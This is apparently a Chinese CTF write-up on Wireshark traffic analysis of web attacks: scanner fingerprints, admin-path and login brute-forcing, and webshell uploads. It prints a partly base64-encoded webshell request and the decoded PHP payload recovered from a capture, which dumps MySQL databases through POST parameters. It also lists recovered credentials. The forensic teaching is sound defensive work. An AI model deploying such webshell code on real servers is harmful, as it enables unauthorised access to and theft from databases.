目錄
WEB掃描分析
后臺目錄爆破分析
后臺賬號爆破
WEBSHELL上傳
其他題目
參考鏈接
WEB資料包分析的題目主要出現WEB攻擊行為的分析上, 典型的WEB攻擊行為有:WEB掃描、后臺目錄爆破、后臺賬號爆破、WEBSHELL上傳、SQL注入等等,
WEB掃描分析
題型:
通過給出的流量包獲取攻擊者使用的WEB掃描工具,
解題思路:
常見的WEB掃描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(綠盟極光),Nessus,WebReaver,Sqlmap等,要識別攻擊者使用的是哪一種掃描器,可通過wireshark篩選掃描器特征來得知,
相關命令:http contains “掃描器特征值”,
1.awvs:acunetix
2.netsparker:netsparker
3.appscan:Appscan
4.nessus:nessus
5.sqlmap:sqlmap
常見的掃描器特征參考:常見掃描器或者自動化工具的特征(指紋)
【練習】安恒八月月賽流量分析:黑客使用的是什么掃描器?
后臺目錄爆破分析
題型:
已知攻擊者通過目錄爆破的手段獲取了網站的后臺地址,請通過給出的流量包獲取后臺地址,
解題思路:
要獲取流量包中記錄的后臺地址,可通過wireshark篩選后臺url特征來得知,
相關命令:http contains “后臺url特征”,
常見后臺url特征:
1.admin
2.manager
3.login
4.system
【練習】安恒八月月賽流量分析:黑客掃描到的后臺登錄地址是什么?
/admin/login.php?rec=login
后臺賬號爆破
題型:
已知攻擊者通過暴力破解的手段獲取了網站的后臺登陸賬號,請通過給出的流量包獲取正確的賬號資訊,
解題思路:
WEB賬號登陸頁面通常采用post方法請求,要獲取流量包中記錄的賬號資訊可通過wireshark篩選出POST請求和賬號中的關鍵字如‘admin’,
相關命令:http.request.method=="POST" and http contains "關鍵字",
【練習】安恒八月月賽流量分析:黑客使用了什么賬號密碼登錄了web后臺?
思路1:登陸后臺99%使用的是POST方法,使用過濾器+追蹤TCP流,有302重定向則登錄成功,剛才使用掃描的源ip一定是黑客的ip地址,使用過濾可得
http.request.method=="POST" and ip.src==192.168.94.59 and http contains "rec=login"
思路2:回傳欄位長度為75X,說定post登錄成功(目前沒搞懂)
WEBSHELL上傳
題型:
已知攻擊者上傳了惡意webshell檔案,請通過給出的流量包還原出攻擊者上傳的webshell內容,
解題思路:
Webshell檔案上傳常采用post方法請求,檔案內容常見關鍵字eval,system,assert要,獲取流量包中記錄的webshell可通過wireshark篩選出POST請求和關鍵字.
相關命令:http.request.method=="POST" and http contains "關鍵字"
【練習】安恒八月月賽流量分析:黑客上傳的webshell檔案名是?內容是什么?
Form item: "action" = "QGluaV9zZXQgKCAiZGlzcGxheV9lcnJvcnMiLCAiMCIgKTtAc2V0X3RpbWVfbGltaXQgKCAwICk7
QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSAoIDAgKTtlY2hvICgiLT58Iik7OyRtID0gZ2V0X21h
Z2ljX3F1b3Rlc19ncGMgKCk7JGNvbmYgPSAkbSA/IHN0cmlwc2xhc2hlcyAo
這樣好像并不完整,追蹤tcp流
其他題目
1.某公司內網網路被黑客滲透,請分析流量,黑客在robots.txt中找到的flag是什么
思路一:匯出物件,搜索robots.txt
保存,然后打開
flag:flag:87b7cb79481f317bde90c116cf36084b
思路二:直接過濾http contains"Disallow"
2.某公司內網網路被黑客滲透,請分析流量,黑客找到的資料庫密碼是多少
常見的方法是:
根據http contains"dbhost"找到資料庫服務器地址10.3.3.101之后,追蹤tcp流
@ini_set ( "display_errors", "0" );@set_time_limit ( 0 );@set_magic_quotes_runtime ( 0 );echo ("->|");;$m = get_magic_quotes_gpc ();$conf = $m ? stripslashes ( $_POST ["z1"] ) : $_POST ["z1"];$ar = explode("choraheiheihei", $conf);$dbn = $m ? stripslashes ( $_POST ["z2"] ) : $_POST ["z2"];$sql = base64_decode ( $_POST ["z3"] );$T = @mysql_connect($ar[0],$ar[1],$ar[2]);@mysql_query ( "SET NAMES utf8" );if($dbn==""){$sql = "SHOW DATABASES";$q = @mysql_query ( $sql );$i = 0;while($rs=@mysql_fetch_row($q)){echo(trim($rs[0]).chr(9))."\t|\t\r\n";}@mysql_close($T);;echo("|<-");die();}else{ @mysql_select_db ( $dbn );$q = @mysql_query ( $sql );$i = 0;while ( $col = @mysql_field_name ( $q, $i ) ) {echo ($col . "\t|\t");$i ++;}echo ("\r\n");while ( $rs = @mysql_fetch_row ( $q ) ) {for($c = 0; $c < $i; $c ++) {echo (trim ( $rs [$c] ));echo ("\t|\t");}echo ("\r\n");}@mysql_close ( $T );;echo ("|<-");die ();}
base64解碼之后,如上
提取出以下主要文本
&z1=10.3.3.101choraheiheiheiwebchoraheiheiheie667jUPvJjXHvEUv&z2=web&z3=c2VsZWN0ICogZnJvbSBkb3Vfc2hvdw==
$ar = explode("choraheiheihei", $conf)
可知以choraheiheihei為分割符號,提取出用戶名為web,密碼為e667jUPvJjXHvEUv
3.某公司內網網路被黑客滲透,請分析流量,黑客在資料庫中找到的hash_code是什么(手上沒有webtwo.pcap)
4.某公司內網網路被黑客滲透,請分析流量,黑客破解了賬號ijnu@test.com得到的密碼是什么
- 某公司內網網路被黑客滲透,請分析流量,被黑客攻擊的web服務器,網卡配置是是什么,提交網卡內網ip
某公司內網網路被黑客滲透,請分析流量,黑客使用了什么賬號登陸了mail系統(形式: username/password)(沒有對應的pcap)
某公司內網網路被黑客滲透,請分析流量,黑客獲得的vpn的ip是多少(沒有對應的pcap)
參考鏈接
CTF流量分析之題型深度決議
ctf之流量分析
安恒八月月賽流量分析writeup
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/282853.html
標籤:其他